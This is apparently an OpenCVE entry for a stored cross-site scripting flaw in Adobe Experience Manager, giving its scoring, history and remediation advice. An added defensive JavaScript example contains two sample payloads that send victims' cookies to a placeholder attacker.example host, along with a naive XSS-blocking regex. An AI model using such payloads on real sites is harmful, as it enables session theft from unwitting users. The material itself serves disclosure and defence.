Description
Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.
Published: 2026-06-09
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier allow a low‑privileged attacker to store malicious JavaScript in form fields whose content is later rendered without adequate escaping. When another user views the page that renders the stored value, the script executes in that user's browser in the context of the AEM site, which can expose session data and page content to the attacker, let the attacker act as the victim within the application, or inject further content into the page. The weakness is improper neutralization of input during web page generation (CWE‑79), which is an output‑encoding flaw rather than purely an input‑validation one. The CVSS 3.1 base score of 5.4 is a medium rating: the attacker needs an account (PR:L), a victim must visit the affected page (UI:R), and the confidentiality and integrity impacts are low with no availability impact.

Affected Systems

The affected products are Adobe Experience Manager instances running 6.5.24, LTS SP1 or 2026.04, or any earlier release covered by the description's "and earlier" qualifier; no fixed version is listed in this entry. Any deployment in which the affected form fields accept content from low‑privileged users and render it to other users is potentially impacted.

Risk and Exploitability

The CVSS base score of 5.4 is a medium rating, and no EPSS score is available, so there is no quantified exploitation probability; the SSVC assessment recorded in the history below rates exploitation as "none" and the flaw as not automatable. The vulnerability is not listed in CISA's KEV catalog, which means no confirmed in‑the‑wild exploitation has been recorded, not that exploitation is impractical. Because the XSS is stored, the attacker does not have to deliver a crafted link to each victim: a low‑privileged account submits the payload into the form field once, and it runs in the browser of every user who later views the page that renders it. The attacker still needs network access to the form and a valid low‑privileged account (AV:N, PR:L), and a victim must visit the page (UI:R). The scope change (S:C) follows the usual CVSS convention for XSS: the vulnerable component is the AEM application, but the impact lands in the victim's browser, a different security authority. It does not by itself mean that more AEM components are affected.

Generated by OpenCVE AI on June 9, 2026 at 20:44 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Adobe Experience Manager to the release that contains the fix for CVE-2026-47981 once Adobe publishes it; at the time of this entry no advisory or fixed version is listed, so confirm the version against the Adobe security bulletin for AEM rather than assuming the next release is patched.
  • Apply context-aware output encoding wherever stored form-field content is rendered (HTML text, attribute, JavaScript and URL contexts each need their own encoder), and validate input on submission as a secondary control. Encoding at render time is what neutralises stored payloads: validation can be bypassed, and content already stored is not revalidated, so also review what the affected fields already contain.
  • As a stop-gap until the patch is deployed, add a web application firewall rule that blocks common XSS payloads on the form's submission endpoint. Treat it as a compensating control only: signature rules miss encoded and event-handler variants, and they do nothing about payloads that are already stored.

Generated by OpenCVE AI on June 9, 2026 at 20:44 UTC.
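The second and third actions above, as an added example that is not AEM, Adobe or OpenCVE code. It models a component that renders a stored form-field value both inside an attribute and as element text, with a vulnerable concatenating render beside an encoding render, and a signature-based WAF rule of the recommended kind. The template, the encoder names, the sample submissions and the attacker.example host are all constructed for the illustration. In AEM itself the equivalent controls are HTL's display contexts (the default text and attribute contexts encode; the unsafe context disables escaping) and the XSSAPI service; this code stands in for them rather than calling them.

```javascript
// Added example (not AEM, Adobe or OpenCVE code): models the render path of a
// stored XSS like the one described and the two mitigations recommended above.
// Field values are constructed sample submissions; attacker.example is a placeholder.

// Context-aware output encoding. AEM does this through HTL display contexts and
// XSSAPI; this helper is a stand-in, not that API.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Vulnerable: the stored value is concatenated straight into markup, once in an
// attribute and once as element text (the HTL equivalent is @ context='unsafe').
function renderUnsafe(storedValue) {
  return `<input name="comment" value="${storedValue}">` +
         `<p class="preview">${storedValue}</p>`;
}

// Hardened: every interpolation is encoded for the context it lands in. Both
// contexts here are HTML text/attribute, so one encoder covers both; a JavaScript
// string or URL context would need its own encoder.
function renderSafe(storedValue) {
  const encoded = encodeForHtml(storedValue);
  return `<input name="comment" value="${encoded}">` +
         `<p class="preview">${encoded}</p>`;
}

// The template contributes exactly three tags (<input>, <p>, </p>); any extra
// tag in the rendered output came from the stored value.
const TEMPLATE_TAGS = 3;
function tagCount(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}
function injectsMarkup(renderFn, storedValue) {
  return tagCount(renderFn(storedValue)) > TEMPLATE_TAGS;
}

// The WAF stop-gap from the recommendations, written as a signature blocklist.
// It catches the textbook payload and misses the event-handler variant, which
// is why it is a compensating control and not the fix.
const NAIVE_XSS_SIGNATURE = /<script|javascript:/i;
function wafBlocks(submission) {
  return NAIVE_XSS_SIGNATURE.test(submission);
}

// Constructed submissions a low-privileged user might store in the field.
const BENIGN = "Looks good, thanks!";
const SCRIPT_TAG =
  "<script>location='https://attacker.example/?c='+document.cookie</script>";
const EVENT_HANDLER =
  '"><img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Run one submission through the WAF, the vulnerable render and the hardened render.
function evaluate(submission) {
  return {
    wafBlocks: wafBlocks(submission),
    unsafeInjects: injectsMarkup(renderUnsafe, submission),
    safeInjects: injectsMarkup(renderSafe, submission),
  };
}

for (const [name, submission] of Object.entries({ BENIGN, SCRIPT_TAG, EVENT_HANDLER })) {
  console.log(name, evaluate(submission));
}
```

The event-handler submission is the instructive row: the blocklist lets it through, the concatenating render turns it into a live img element with an onerror handler, and the encoding render leaves it as inert text in both the attribute and the paragraph.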

Advisories

No advisories yet.

History

Wed, 10 Jun 2026 03:00:00 +0000

Type: First Time appeared
  Values added: Adobe, Adobe adobe Experience Manager
Type: Vendors & Products
  Values added: Adobe, Adobe adobe Experience Manager

Tue, 09 Jun 2026 21:30:00 +0000

Type: Metrics
  Values added: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 09 Jun 2026 17:15:00 +0000

Type: Description
  Values added: Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.
Type: Title
  Values added: Adobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)
Type: Weaknesses
  Values added: CWE-79
Type: References
Type: Metrics
  Values added: cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: adobe

Published:

Updated: 2026-06-09T19:45:03.457Z

Reserved: 2026-05-20T15:50:31.366Z

Link: CVE-2026-47981

Vulnrichment

Updated: 2026-06-09T19:44:57.448Z

NVD

Status : Undergoing Analysis

Published: 2026-06-09T17:17:40.963

Modified: 2026-06-09T19:30:24.713

Link: CVE-2026-47981

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-10T02:45:15Z

Weaknesses